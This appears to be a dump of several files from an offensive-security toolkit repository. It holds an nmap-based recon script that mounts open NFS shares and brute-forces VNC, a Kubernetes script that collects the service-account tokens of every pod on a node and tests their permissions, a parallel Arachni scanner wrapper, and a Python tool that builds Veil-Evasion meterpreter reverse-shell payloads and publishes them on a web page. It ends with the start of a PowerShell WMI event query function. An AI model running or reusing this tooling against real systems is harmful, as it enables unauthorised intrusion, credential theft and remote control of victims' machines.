| logit "Finished Discovery Scan" 42 | 43 | #Create live host list (live-hosts.txt) 44 | awk '/Up/{print $2}' $1ping-sweep |sort -u > $1live-hosts.txt 45 | linecount=$(cat $1live-hosts.txt | wc -l) 46 | report "There are $linecount hosts on the network." 47 | read -p "Check that the exclusions were actually excluded and then press [Enter] to continue..." 48 | #Builds a list of ports to scan in ports.txt 49 | 50 | echo 445 > $1ports.txt 51 | echo 21 >> $1ports.txt 52 | echo 23 >> $1ports.txt 53 | echo 25 >> $1ports.txt 54 | echo 53 >> $1ports.txt 55 | echo 389 >> $1ports.txt 56 | echo 686 >> $1ports.txt 57 | echo 1433 >> $1ports.txt 58 | echo 2049 >> $1ports.txt 59 | echo 3306 >> $1ports.txt 60 | echo 5800,5900-5920 >> $1ports.txt 61 | echo 5985 >> $1ports.txt #Rob Fuller/Chris Gates Dirty little secrets part 2. Psexec-winrm MSF module 62 | echo 10000 >> $1ports.txt 63 | echo 80 >> $1ports.txt 64 | 65 | #Service Scan loop. Loops through and scans the list of services created above. 66 | 67 | echo -e "====================================" 68 | echo -e "Beginning Targetted Service Scans" 69 | echo -e "====================================" 70 | 71 | for port in $(cat $1ports.txt); 72 | do report "Scanning port $port"; 73 | logit "Start Scanning port $port"; 74 | nmap -Pn -p$port -sV -sC --open -T4 -oA $1$port -v10 --stats-every 1m -iL $1live-hosts.txt; 75 | logit "Finished Scanning port $port"; 76 | report "Finished Scanning port $port" 77 | done 78 | 79 | mkdir $1Finals 80 | 81 | #list Telnet IPs minus printers 82 | awk '!/telnet\?/ && !/print/ && !/printer/ && !/JetDirect/ && !/#/ && !/tcpwrapped/ && !/Ricoh/ && !/Up/ && !/APC/ && !/Pocket/' 23.gnmap | uniq > $1/Finals/TelnetList.gnmap 83 | report "Telnet list created" 84 | 85 | #SMTP Relay Nmap Script. 86 | 87 | echo -e "====================================" 88 | echo -e "Beginning SMTP Open Relay" 89 | echo -e "and Enumeration NSE scripts" 90 | echo -e "====================================" 91 | 92 | awk '!/printer/ && !/JetDirect/ && !/#/ && !/tcpwrapped/ && !/Ricoh/ && !/Up/ && !/APC/ && !/Pocket/{print $2}' 25.gnmap | uniq > smtprelay.txt 93 | 94 | report "Checking for open relays" 95 | logit "Start Open Relay Scan" 96 | nmap -Pn --script smtp-open-relay.nse -p 25,465,587 --open -iL smtprelay.txt -oA $1Finals/SMTP_Relay 97 | report "Finished Open Relay Scan" 98 | 99 | report "Checking for SMTP user enumeration" 100 | logit "Start Open Relay Scan" 101 | nmap -Pn --script smtp-enum-users.nse -p 25,465,587 --open -iL smtprelay.txt -oA $1Finals/STMP_Enum 102 | report "Finished Open Relay Scan" 103 | 104 | rm smtprelay.txt 105 | 106 | #HTTP(s) Screenshots 107 | 108 | 109 | #List IPs that have 445 open and save as windows hosts? 110 | awk '!/#/{print $2}' 445.gnmap | sort -u > 445.txt 111 | 112 | echo -e "====================================" 113 | echo -e "Beginning NFSulator" 114 | echo -e "====================================" 115 | 116 | #Tim Gamble's NFS script 117 | awk '!/#/{print $2}' 2049.gnmap | sort -u > nfs.txt 118 | #!/bin/bash 119 | ipfile=nfs.txt 120 | 121 | ### Delete Temp file 122 | rm -f ./temp.txt 2>./error.log 123 | 124 | ### Create /tmp mountpoint 125 | if [ ! -d /tmp/nfsmount ]; then 126 | mkdir -p /tmp/nfsmount 127 | fi 128 | 129 | ### Checking and Showing open NFS shares 130 | 131 | if [ -z "$ipfile" ]; then 132 | usage 133 | else 134 | for i in `cat $ipfile` ; do showmount -e $i | grep "/" | awk ' { print "'$i'"":"$1 } ' >> temp.txt ; done 135 | for z in `cat ./temp.txt` ; do umount /tmp/nfsmount 2>./error.log ; echo "Mounting $z" ; echo "Mount Command: mount -t nfs -o nolock $z /tmp/nfsmount" ; mount -t nfs -o nolock $z /tmp/nfsmount 2>./error.log ; ls -lah /tmp/nfsmount 2>./error.log ; echo "Un-Mounting $z" ; umount /tmp/nfsmount 2>./error.log ; echo -e "\n" ; done 136 | echo -e "Unmount Command: umount /tmp/nfsmount\n" 137 | fi 138 | 139 | 140 | 141 | rm -f ./temp.txt 142 | 143 | read -p "Review the NFS shares above and then press [Enter] to continue..." 144 | 145 | 146 | #VNC Brute Force 147 | 148 | echo -e "====================================" 149 | echo -e "Beginning VNC-Brute" 150 | echo -e "====================================" 151 | 152 | awk '!/#/{print $2}' 5800,5900-5920.gnmap | sort -u > $1Finals/vnc.txt 153 | report "Brute forcing VNC" 154 | logit "Start VNC-Brute scan" 155 | nmap -Pn --open --script vnc-brute -p 5900-5920,5800 -iL $1Finals/vnc.txt -oA $1Finals/vnc 156 | logit "Finished VNC-Brute scan" 157 | 158 | #Check MSSQL for empty passwords 159 | 160 | echo -e "====================================" 161 | echo -e "Beginning MSSQL " 162 | echo -e "====================================" 163 | 164 | awk '/Up/{print $2}' 1433.gnmap |sort -u > 1433.txt 165 | nmap --script ms-sql-empty-password -iL 1433.txt -oA $1Finals/mssql 166 | 167 | 168 | 169 | 170 | 171 | -------------------------------------------------------------------------------- /k8s/can-they/can-they.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ############################################################################### 3 | # Purpose: 4 | # 5 | # This script will find the token/secret for each pod running on the node and 6 | # tell you what each token is authorized to do. It can be run from within a pod 7 | # that has the host's filesystem mounted to /host, or from outside the pod. 8 | # 9 | # Usage: 10 | # 11 | # *** For execution INSIDE a pod with the host's filesystem mounted to /host *** 12 | # 13 | # This mode is best for: 14 | # - everything-allowed 15 | # - hostPath 16 | # 17 | # Copy the can-they.sh helper script to the pod, download it from github, or manually created it 18 | # kubectl cp scripts/can-they.sh podname:/ 19 | # 20 | # Exec into pod (Don't chroot) 21 | # kubectl exec -it pod-name -- bash 22 | # 23 | # Run can-they.sh 24 | # ./can-they.sh "-i --list" 25 | # ./can-they.sh "-i --list -n kube-system" 26 | # ./can-they.sh "-i --list -n default" 27 | # ./can-they.sh "-i list secrets -n kube-system" 28 | # ./can-they.sh "-i create pods -n kube-system" 29 | # ./can-they.sh "-i create clusterrolebindings" 30 | # 31 | # 32 | # *** For execution OUTSIDE a pod *** 33 | # 34 | # This mode is best for: 35 | # - priv-and-hostpid 36 | # 37 | # Run can-they.sh 38 | # ./can-they.sh -n NAMESPACE -p POD_NAME -i "OPTIONS" 39 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "list secrets -n kube-system" 40 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "--list" 41 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "-n kube-system" 42 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "get secrets -n kube-system" 43 | # 44 | ############################################################################### 45 | function check-can-exec-pod { 46 | check=$(kubectl auth can-i create pods/exec -n $namespace) 47 | #echo $check 48 | if [[ $check == "no" ]]; then 49 | echo "Are you sure you have access to exec into $pod in the $namespace namespace?" 50 | exit 1 51 | fi 52 | } 53 | 54 | function run-outside-pod { 55 | # Get the filenames that contain tokens from the mounted host directory 56 | tokens=`kubectl exec -it $pod -n $namespace -- find /host/var/lib/kubelet/pods/ -name token -type l 2>/dev/null` 57 | 58 | # Backup plan in case you are chrooted or running on host 59 | if [ $? -eq 1 ]; then 60 | tokens=`kubectl exec -it $pod -n $namespace -- find /var/lib/kubelet/pods/ -name token -type l` 61 | fi 62 | #tokens=`kubectl exec -it $pod -n $namespace -- find /var/lib/kubelet/pods/ -name token -type l` 63 | for filename in $tokens; do 64 | filename_clean=`echo $filename | tr -dc '[[:print:]]'` 65 | echo "--------------------------------------------------------" 66 | echo "Token Location: $filename_clean" 67 | tokena=`kubectl exec -it $pod -n $namespace -- cat $filename_clean` 68 | echo -n "Can I $user_input? " 69 | SERVER=`kubectl config view --minify --flatten -ojsonpath='{.clusters[].cluster.server}'` 70 | export KUBECONFIG="dummy" 71 | #echo "kubectl --server=$SERVER --insecure-skip-tls-verify --token=$tokena auth can-i $user_input" 72 | echo 73 | kubectl --server=$SERVER --insecure-skip-tls-verify --token=$tokena auth can-i $user_input 2> /dev/null; echo; \ 74 | unset KUBECONFIG 75 | done 76 | } 77 | 78 | function am-i-inside-pod-check { 79 | echo $KUBERNETES_SERVICE_HOST 80 | if [[ -z $KUBERNETES_SERVICE_HOST ]]; then 81 | echo "It does not appear you are in a Kubernetes pod?" 82 | echo 83 | usage 84 | fi 85 | } 86 | 87 | function run-inside-pod { 88 | if [ ! -f "/usr/local/bin/kubectl" ]; then 89 | apt update && apt -y install curl 90 | #Download and install kubectl into pod 91 | curl -LO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl" 92 | chmod +x ./kubectl 93 | mv ./kubectl /usr/local/bin/kubectl 94 | fi 95 | 96 | # Get the filenames that contain tokens from the mounted host directory 97 | tokens=`find /host/var/lib/kubelet/pods/ -name token -type l` 98 | # Backup plan in case you are chrooted or running on host 99 | if [ $? -eq 1 ]; then 100 | tokens=`find /var/lib/kubelet/pods/ -name token -type l` 101 | fi 102 | #For each token, print the token location and run `kubectl auth can-i list` using each token via the `--token` command line argument. 103 | for filename in $tokens; do 104 | filename_clean=`echo $filename | tr -dc '[[:print:]]'` 105 | echo "--------------------------------------------------------" 106 | echo "Token Location: $filename_clean" 107 | tokena=`cat $filename_clean` 108 | echo -n "Can I $user_input? " 109 | kubectl --token=$tokena auth can-i $user_input 110 | echo 111 | done 112 | } 113 | 114 | function usage { 115 | echo "Usage: " 116 | echo 117 | echo " [From outside a pod]: $0 -p podname -n namespace [-i \"VERB [TYPE] [options]\"]" 118 | echo " [From inside a pod]: $0 [-i \"VERB [TYPE] [options]\"]" 119 | echo 120 | echo "Options: " 121 | echo 122 | printf " -p\tPod Name\n" 123 | printf " -n\tNamespace\n" 124 | printf " -i\tArugments that you would normally pass to kubectl auth can-i []\n" 125 | echo 126 | exit 1 127 | } 128 | 129 | while getopts n:p:i: flag 130 | do 131 | case "${flag}" in 132 | n) namespace=${OPTARG};; 133 | p) pod=${OPTARG};; 134 | i) user_input=${OPTARG};; 135 | *) usage;; 136 | esac 137 | done 138 | 139 | if [[ -z "$user_input" ]]; then 140 | user_input="--list" 141 | fi 142 | 143 | 144 | 145 | if [[ "$namespace" ]] && [[ "$pod" ]]; then 146 | #echo "outside" 147 | check-can-exec-pod 148 | run-outside-pod 149 | 150 | elif [[ -z "$namespace" ]] && [[ -z "$pod" ]]; then 151 | #echo "inside" 152 | am-i-inside-pod-check 153 | run-inside-pod 154 | else 155 | echo "If running this script from outside a pod, you need to specify both the pod name and the namespace" 156 | usage 157 | fi 158 | -------------------------------------------------------------------------------- /multi_arachni.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Written by Andrew Luke (@sw4mp_f0x) and Steve Borosh (@424f424f) 4 | # 5 | # 6 | 7 | from Queue import Queue 8 | from threading import Thread 9 | import subprocess 10 | from optparse import OptionParser 11 | import os 12 | import datetime 13 | from time import sleep 14 | 15 | def worker(workerid): 16 | while not q.empty(): 17 | try: 18 | # Pull target from Queue 19 | target = q.get() 20 | if target.split('//')[0].lower() == 'https:': 21 | target_file = target.split('/')[2] + '[s]' 22 | else: 23 | target_file = target.split('/')[2] 24 | except: 25 | break 26 | 27 | 28 | print('\x1b[1;31;40m' + workerid + ": scanning {}...".format(target) + '\x1b[0m') 29 | 30 | # Run Arachni against target 31 | cmd1 = './arachni {} --timeout {} --report-save-path=/opt/arachni-1.4-0.5.10/bin/output/{}/{}.afr'.format(target,timeout,projectname,target_file) 32 | 33 | # Generate HTML and TXT reports from results 34 | cmd2 = './arachni_reporter output/{}/{}.afr --reporter=txt:outfile=complete/{}/{}.txt'.format(projectname,target_file,projectname,target_file) 35 | cmd3 = './arachni_reporter output/{}/{}.afr --reporter=html:outfile=complete/{}/{}.html.zip'.format(projectname,target_file,projectname,target_file) 36 | try: 37 | task = subprocess.Popen(cmd1, shell=True, stdout=subprocess.PIPE) 38 | # Prints output and waits until subprocess is complete before continuing 39 | out = task.communicate()[0] 40 | print out 41 | 42 | print('\x1b[1;31;40m' + workerid + ': Building reports for ' + target_file + '\x1b[0m') 43 | print subprocess.Popen(cmd2, shell=True, stdout=subprocess.PIPE).stdout.read() 44 | print subprocess.Popen(cmd3, shell=True, stdout=subprocess.PIPE).stdout.read() 45 | q.task_done() 46 | except Exception as e: 47 | print e 48 | print('\x1b[1;31;40m' + workerid + ': ' + target_file + ' Complete!' + '\x1b[0m') 49 | print('\x1b[1;31;40m' + workerid + ': No more targets. Exiting.' + '\x1b[0m') 50 | 51 | 52 | def main(): 53 | 54 | # Argument parsing 55 | usage = "usage: %prog -p ProjectName -f PathToFile [-t Timeout]" 56 | parser = OptionParser(usage=usage) 57 | parser.add_option('-p', '--project', action="store", help='Name used to identify the project', dest='projectname') 58 | parser.add_option('-f', '--file', action="store", help='File with list of URLs', dest='filename') 59 | parser.add_option('-t', '--timeout', action="store", help="Scan Timeout HOURS:MINUTES:SECONDS", dest='timeout', default='01:00:00') 60 | (options, args) = parser.parse_args() 61 | 62 | # Checking for required arguments 63 | if not options.projectname or not options.filename: 64 | parser.error("The project name and file name must be defined.") 65 | 66 | # Setting script variables 67 | file = options.filename 68 | global timeout 69 | timeout = options.timeout 70 | global projectname 71 | projectname = options.projectname 72 | global q 73 | q = Queue() 74 | num_worker_threads = 4 75 | totaltargets = 0 76 | current_worker = 0 77 | starttime = datetime.datetime.now() 78 | 79 | # Create project folders 80 | if not os.path.exists('/opt/arachni-1.4-0.5.10/bin/output/' + projectname): 81 | os.makedirs('/opt/arachni-1.4-0.5.10/bin/output/' + projectname) 82 | if not os.path.exists('/opt/arachni-1.4-0.5.10/bin/complete/' + projectname): 83 | os.makedirs('/opt/arachni-1.4-0.5.10/bin/complete/' + projectname) 84 | 85 | # Parse provided target file into Queue 86 | print('\x1b[1;31;40m' + 'Building Target Queue...' + '\x1b[0m') 87 | with open(file) as f: 88 | for url in f: 89 | try: 90 | target = url.strip() 91 | q.put(target) 92 | totaltargets += 1 93 | print 'URL Added.' 94 | except Exception as e: 95 | print e 96 | f.close() 97 | 98 | # Create and label workers 99 | print('\x1b[1;31;40m' + 'Creating Workers...' + '\x1b[0m') 100 | for i in range(num_worker_threads): 101 | current_worker += 1 102 | workerid = 'Worker-' + str(current_worker) 103 | t = Thread(target=worker,name=workerid, args=(workerid,)) 104 | t.daemon = True 105 | t.start() 106 | print workerid + ' Created.' 107 | 108 | # Until the Queue is empty, print a status update every 3 minutes 109 | sleep(10) 110 | while not q.empty(): 111 | currenttargets = q.qsize() 112 | currenttime = datetime.datetime.now() 113 | elapsedtime = currenttime - starttime 114 | print('\x1b[1;31;40m' + '=============Scan Status=============' + '\x1b[0m') 115 | print('\x1b[1;31;40m' + 'Total targets: ' + str(totaltargets) + '\x1b[0m') 116 | print('\x1b[1;31;40m' + 'Remaining targets: ' + str(currenttargets) + '\x1b[0m') 117 | print('\x1b[1;31;40m' + 'Time: ' + str(elapsedtime) + '\x1b[0m') 118 | sleep(180) 119 | 120 | q.join() 121 | endtime = datetime.datetime.now() 122 | totaltime = endtime - starttime 123 | 124 | # Merge afr files and generate merged report 125 | print('\x1b[1;31;40m' + 'Building final, merged report...' + '\x1b[0m') 126 | cmd1 = './arachni_script merge.rb output/{}/* output/{}/MERGED.afr'.format(projectname,projectname) 127 | cmd2 = './arachni_reporter output/{}/MERGED.afr --reporter=html:outfile=complete/{}/MERGED_REPORT.html.zip'.format(projectname,projectname) 128 | task1 = subprocess.Popen(cmd1, shell=True, stdout=subprocess.PIPE) 129 | out = task1.communicate()[0] 130 | print out 131 | 132 | task2 = subprocess.Popen(cmd2, shell=True, stdout=subprocess.PIPE) 133 | out = task2.communicate()[0] 134 | print out 135 | 136 | # Completion notice 137 | print('\x1b[1;31;40m' + 'Report Complete.' + '\x1b[0m') 138 | print('\x1b[1;31;40m' + '=============Scans Complete=============' + '\x1b[0m') 139 | print('\x1b[1;31;40m' + 'Total targets: ' + str(totaltargets) + '\x1b[0m') 140 | print('\x1b[1;31;40m' + 'Time: ' + str(totaltime) + '\x1b[0m') 141 | 142 | if __name__ == "__main__": 143 | main() 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /Roll For Initiative/boost.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import sys 5 | import socket 6 | import fcntl 7 | import struct 8 | import argparse 9 | import datetime 10 | import re 11 | 12 | if os.path.isfile('/etc/veil/settings.py'): 13 | try: 14 | sys.path.append("/etc/veil/") 15 | import settings as VeilSettings 16 | sys.path.append(VeilSettings.VEIL_EVASION_PATH) 17 | 18 | # import controller module 19 | from modules.common import controller as VeilController 20 | 21 | except: 22 | print "Somthing went wrong with the veil configuration." 23 | sys.exit(0) # Check for Veil installation and import if present 24 | else: 25 | print "Veil is not installed, or the configuration file does not exist." 26 | print "Please ensure that the configuration file /etc/veil/settings.py has been created." 27 | 28 | # Build namespaces to pass args to Veil functions 29 | class Namespace: 30 | def __init__(self, **kwargs): 31 | self.__dict__.update(kwargs) 32 | 33 | def isIPValid(address): # WORKING Citation: Maria Zverina http://stackoverflow.com/a/11264379 34 | try: 35 | host_bytes = address.split('.') 36 | valid = [int(b) for b in host_bytes] 37 | valid = [b for b in valid if b >= 0 and b<=255] 38 | return len(host_bytes) == 4 and len(valid) == 4 39 | except: 40 | return False 41 | 42 | def findIP(interface): # WORKING 43 | try: 44 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 45 | ip = socket.inet_ntoa(fcntl.ioctl( 46 | s.fileno(), 47 | 0x8915, # SIOCGIFADDR 48 | struct.pack('256s', interface[:15]) 49 | )[20:24]) 50 | return ip 51 | except: 52 | print "ERROR: No IP Address Assigned.\n\n Make sure " + str(interface) + " has an IP configured." 53 | sys.exit(1) 54 | 55 | 56 | 57 | def BuildVeilTCP(LHOST, LPORT, outputbasename, lang, pwnstaller=True, overwrite=True, **kwargs): # IMPLEMENT 58 | ''' 59 | kwargs: 60 | 61 | ''' 62 | 63 | # Instantiate the controller 64 | controller = VeilController.Controller(oneRun=True) 65 | 66 | # Build the options dictionaries. 67 | options = {} 68 | options['required_options'] = {} 69 | 70 | # Set the options per language. 71 | if str.lower(lang) == 'python': 72 | print "Using python" 73 | options['required_options']['ARCHITECTURE'] = ['32', ""] 74 | options['required_options']['COMPILE_TO_EXE'] = ['Y', ""] 75 | options['required_options']['EXPIRE_PAYLOAD'] = ['X', ""] 76 | options['required_options']['LHOST'] = [LHOST, ""] 77 | options['required_options']['LPORT'] = [LPORT, ""] 78 | options['required_options']['USE_PYHERION'] = ['Y', ""] 79 | args = Namespace(o=outputbasename + "p", pwnstaller=pwnstaller, overwrite=overwrite) 80 | controller.SetPayload('python/meterpreter/rev_tcp', options) 81 | elif str.lower(lang) == 'ruby': 82 | print "Using Ruby" 83 | options['required_options']['LHOST'] = [LHOST, ""] 84 | options['required_options']['LPORT'] = [LPORT, ""] 85 | args = Namespace(o=outputbasename + "r", pwnstaller=False, overwrite=overwrite) 86 | controller.SetPayload('ruby/meterpreter/rev_tcp', options) 87 | 88 | elif str.lower(lang) == 'powershell': 89 | # Add logic. 90 | print "Using powershell" 91 | options['required_options']['LHOST'] = [LHOST, ""] 92 | options['required_options']['LPORT'] = [LPORT, ""] 93 | args = Namespace(o=outputbasename + "p", pwnstaller=False, overwrite=overwrite) 94 | controller.SetPayload('powershell/meterpreter/rev_tcp', options) 95 | # Continue to add more languages here. 96 | 97 | else: 98 | print "BuildVeilTCP: Error - Invalid lang setting." 99 | 100 | # Generate the payload 101 | payloadcode = controller.GeneratePayload() 102 | 103 | # Gotta change into the Veil-Evasion directory. Save current working dir, change, then change back. 104 | workingdirectory = os.getcwd() 105 | os.chdir(VeilSettings.VEIL_EVASION_PATH) 106 | outFile = controller.OutputMenu(controller.payload, payloadcode, showTitle=False, interactive=False, args=args) 107 | 108 | # Changing back 109 | os.chdir(workingdirectory) 110 | if str.lower(lang) == 'powershell': 111 | f = open(outFile, 'r') 112 | fr = f.read() 113 | f.close() 114 | print fr + "\n" 115 | return fr # outFile 116 | return outFile 117 | 118 | def BuildVeilHTTPS(LHOST, LPORT, outputbasename, lang, pwnstaller=True, overwrite=True, **kwargs): # IMPLEMENT 119 | 120 | # Instantiate the controller 121 | controller = VeilController.Controller(oneRun=True) 122 | 123 | # Build the options dictionaries. 124 | options = {} 125 | options['required_options'] = {} 126 | 127 | # Set the options per language. 128 | if str.lower(lang) == 'python': 129 | print "Using python" 130 | options['required_options']['ARCHITECTURE'] = ['32', ""] 131 | options['required_options']['COMPILE_TO_EXE'] = ['Y', ""] 132 | options['required_options']['EXPIRE_PAYLOAD'] = ['X', ""] 133 | options['required_options']['LHOST'] = [LHOST, ""] 134 | options['required_options']['LPORT'] = [LPORT, ""] 135 | options['required_options']['USE_PYHERION'] = ['Y', ""] 136 | args = Namespace(o=outputbasename + "p", pwnstaller=pwnstaller, overwrite=overwrite) 137 | controller.SetPayload('python/meterpreter/rev_https', options) 138 | elif str.lower(lang) == 'ruby': 139 | print "Using Ruby" 140 | options['required_options']['LHOST'] = [LHOST, ""] 141 | options['required_options']['LPORT'] = [LPORT, ""] 142 | args = Namespace(o=outputbasename + "r", pwnstaller=pwnstaller, overwrite=overwrite) 143 | controller.SetPayload('ruby/meterpreter/rev_https', options) 144 | 145 | elif str.lower(lang) == 'powershell': 146 | # Add logic. 147 | print "Using powershell" 148 | options['required_options']['LHOST'] = [LHOST, ""] 149 | options['required_options']['LPORT'] = [LPORT, ""] 150 | args = Namespace(o=outputbasename + "p", pwnstaller=False, overwrite=overwrite) 151 | controller.SetPayload('powershell/meterpreter/rev_https', options) 152 | # Continue to add more languages here. 153 | 154 | else: 155 | print "BuildVeilHTTPS: Error - Invalid lang setting." 156 | return 157 | 158 | # Generate the payload 159 | payloadcode = controller.GeneratePayload() 160 | 161 | # Gotta change into the Veil-Evasion directory. Save current working dir, change, then change back. 162 | workingdirectory = os.getcwd() 163 | os.chdir(VeilSettings.VEIL_EVASION_PATH) 164 | outFile = controller.OutputMenu(controller.payload, payloadcode, showTitle=False, interactive=False, args=args) 165 | 166 | # Changing back 167 | os.chdir(workingdirectory) 168 | if str.lower(lang) == 'powershell': 169 | f = open(outFile, 'r') 170 | fr = f.read() 171 | f.close() 172 | print fr + "\n" 173 | return fr # outFile 174 | 175 | return outFile 176 | 177 | 178 | def BuildHTTPPage(LHOST, LPORT): # Building 179 | # Build exploit function 180 | def exploit(title, id, d): 181 | r = '

\n' 182 | r += '

' + title + '

\n' 183 | r += '
\n' 184 | r += '
' 185 | r += d + "\n" 186 | r += '
\n' 187 | r += '\n' 188 | r += '\n' 189 | r += '
\n' 190 | return r 191 | 192 | # Set outbase name for payloads based on current days date. 193 | today = datetime.date.today() 194 | outputbase = str(today.strftime('%Y%m%d')) 195 | 196 | # Build payloads 197 | tcp_ps = BuildVeilTCP(LHOST, LPORT, outputbase + 'tcp', lang='powershell', pwnstaller=True, overwrite=True) 198 | tcp_python = BuildVeilTCP(LHOST, LPORT, outputbase + 'tcp', lang='python', pwnstaller=True, overwrite=True) 199 | tcp_ruby = BuildVeilTCP(LHOST, LPORT, outputbase + 'tcp', lang='ruby', pwnstaller=True, overwrite=True) 200 | https_ps = BuildVeilHTTPS(LHOST, LPORT, outputbase + 'https', lang='powershell', pwnstaller=True, overwrite=True) 201 | https_python = BuildVeilHTTPS(LHOST, LPORT, outputbase + 'https', lang='python', pwnstaller=True, overwrite=True) 202 | https_ruby = BuildVeilHTTPS(LHOST, LPORT, outputbase + 'https', lang='ruby', pwnstaller=True, overwrite=True) 203 | 204 | 205 | # Build HTTP Header 206 | http = '\n' 207 | http += '\n' 208 | http += '\n' 209 | http += '\tPROJECT BOOST\n' 210 | http += '\t\n' 211 | http += '\t\n' 212 | http += '\t\n' 213 | http += '\t\n' 214 | http += '\n' 215 | http += '\n' 235 | 236 | # Build HTTP Body 237 | http += '\n' 238 | http += 'IP Address: ' + str(LHOST) + '
\n' 239 | http += 'Port: ' + str(LPORT) + '
\n' 240 | 241 | http += exploit('Veil Powershell TCP', 'VeilPSTCP', tcp_ps) 242 | http += exploit('Veil Python TCP', 'VeilPYTCP', tcp_python) 243 | http += exploit('Veil Ruby TCP', 'VeilRubyTCP', tcp_ruby) 244 | http += exploit('Veil Powershell HTTPS', 'VeilPSHTTPS', https_ps) 245 | http += exploit('Veil Python HTTPS', 'VeilPYHTTPS', https_python) 246 | http += exploit('Veil Ruby HTTPS', 'VeilRubyHTTPS', https_ruby) 247 | 248 | # Finish the file. 249 | http += '
This file generated at : ' 250 | http += str(datetime.datetime.now()) 251 | http += '
\n' 252 | http += '\n' 253 | http += '\n' 254 | 255 | return http 256 | 257 | 258 | def main(): 259 | 260 | # Argument Parser 261 | try: 262 | parser = argparse.ArgumentParser( 263 | prog="Boost", 264 | description="Boost Script", 265 | epilog="Build the exploit environment.", 266 | formatter_class=argparse.RawTextHelpFormatter, 267 | ) 268 | APRequiredGroup = parser.add_argument_group('General Program Options', 'General Configuration') 269 | APOptionalGroup = parser.add_argument_group('Optional Options', 'Optional Options') 270 | 271 | # Add arguments to the general group 272 | APRequiredGroup.add_argument('-i', '--interface', help="Interface the handler is on.") 273 | APRequiredGroup.add_argument('-p', '--port', help="Port the handler is listening on.") 274 | 275 | # Add arguments to the optional group 276 | APOptionalGroup.add_argument('-v', "--verbose", help="More verbose output.") 277 | # Generate argument parser. 278 | options = parser.parse_args()# Build argument parser. 279 | except: 280 | print "Argument Parser: Somthing went wrong. Check flags." 281 | sys.exit(1)# If Argparse fails, quit. 282 | 283 | # Check for null command line 284 | if not any([options.interface]) or not any([options.port]): 285 | parser.print_help() 286 | sys.exit(1) 287 | 288 | 289 | print "Now trying to write it to a file." 290 | f = open('/var/www/html/indextesting.html', 'w') 291 | f.write(BuildHTTPPage(findIP(options.interface), options.port)) 292 | f.close() 293 | # f = open('/var/www/html/indextesting.html', 'r') 294 | # print f.read() 295 | # f.close() 296 | # print os.path.isfile('/var/www/html/indextesting.html') 297 | # print "Testing finished." 298 | 299 | 300 | if __name__ == '__main__': 301 | main() 302 | -------------------------------------------------------------------------------- /PowerShellWMIEvents.ps1: -------------------------------------------------------------------------------- 1 | function Get-WMIEvent { 2 | 3 | <# 4 | .SYNOPSIS 5 | 6 | Queries WMI for all __FilterToConsumerBinding, __EventFilter, and __EventConsumer instances as well as local events. 7 | 8 | .DEFINITION 9 | 10 | Default output is a hash table with 4 ArrayList properties containing WMI LocalEvents, PermanentEvents, Consumers, and Filters. 11 | Each property will contain the associated WMI objects These can also be individually output using switches. 12 | 13 | .PARAMETER Local 14 | 15 | Indicates that local WMI events are returned with the results of the command. 16 | 17 | .PARAMETER Permanent 18 | 19 | Indicates that permanent WMI events are returned with the results of the command. 20 | 21 | .PARAMETER Consumer 22 | 23 | Indicates that WMI event consumers are returned with the results of the command. 24 | 25 | .PARAMETER Filter 26 | 27 | Indicates that WMI event filters are returned with the results of the command. 28 | 29 | .PARAMETER Name 30 | 31 | Specifies the WMI event name to return. 32 | 33 | .PARAMETER ComputerName 34 | 35 | Specifies the remote computer system to add a permanent WMI event to. The default is the local computer. 36 | 37 | Type the NetBIOS name, an IP address, or a fully qualified domain name (FQDN) of one or more computers. To specify the local computer, type the computer name, a dot (.), or localhost. 38 | 39 | .PARAMETER Credential 40 | 41 | The credential object used to authenticate to the remote system. If not specified, the current user instance will be used. 42 | 43 | .EXAMPLE 44 | 45 | PS C:\>Get-WMIEvent -Name TestEvent 46 | 47 | This command will return all WMI event objects named 'TestEvent'. 48 | 49 | .EXAMPLE 50 | 51 | PS C:\>Get-WMIEvent -Consumer -Filter 52 | 53 | This command will return all WMI event consumers and filters. 54 | 55 | .EXAMPLE 56 | 57 | PS C:\>Get-WMIEvent -Permanent | Remove-WMIEvent 58 | 59 | This command will return all permanent WMI events and then remove the event object and their associated consumers and filters. 60 | 61 | .OUTPUTS 62 | 63 | System.Object.Hashtable, System.Object.PSEventSubscriber, System.Management.ManagementBaseObject.ManagementObject 64 | 65 | By default, this cmdlet returns a System.Object.Hashtable object. If you use the Local parameter, it returns a System.Object.PSEventSubscriber 66 | object. If you use the Permanent, Consumer, or Filter parameter, it returns a System.Management.ManagementBaseObject.ManagementObject object. 67 | 68 | #> 69 | 70 | Param ( 71 | 72 | [Switch] 73 | $Local, 74 | 75 | [Switch] 76 | $Permanent, 77 | 78 | [Switch] 79 | $Consumer, 80 | 81 | [Switch] 82 | $Filter, 83 | 84 | [String] 85 | $Name, 86 | 87 | [String] 88 | $ComputerName, 89 | 90 | [Management.Automation.PSCredential] 91 | $Credential 92 | ) 93 | $Arguments = @{} 94 | if ($ComputerName){ 95 | $Arguments['ComputerName'] = $ComputerName 96 | if ($Credential){ 97 | $Arguments['Credential'] = $Credential 98 | } 99 | } 100 | if ($Name){ 101 | $Arguments['Filter'] = "__RELPATH LIKE `"%$Name%`"" 102 | } 103 | if (!$Local -and !$Permanent -and !$Consumer -and !$Filter){ 104 | if(!$ComputerName){ 105 | $LocalEvents = Get-EventSubscriber 106 | } 107 | $PermanentEvents = Get-WmiObject '__FilterToConsumerBinding' -Namespace root/subscription @Arguments 108 | [System.Collections.ArrayList]$Consumers = @() 109 | [System.Collections.ArrayList]$Filters = @() 110 | foreach($EventEntry in $PermanentEvents){ 111 | $ConsumerId = $EventEntry.Consumer 112 | $FilterId = $EventEntry.Filter 113 | $Arguments['Filter'] = "__RELPATH='$ConsumerId'" 114 | [void]$Consumers.Add($(Get-WmiObject -Namespace root/subscription -Class $($ConsumerId.Split('.')[0]) @Arguments)) 115 | $Arguments['Filter'] = "__RELPATH='$FilterId'" 116 | 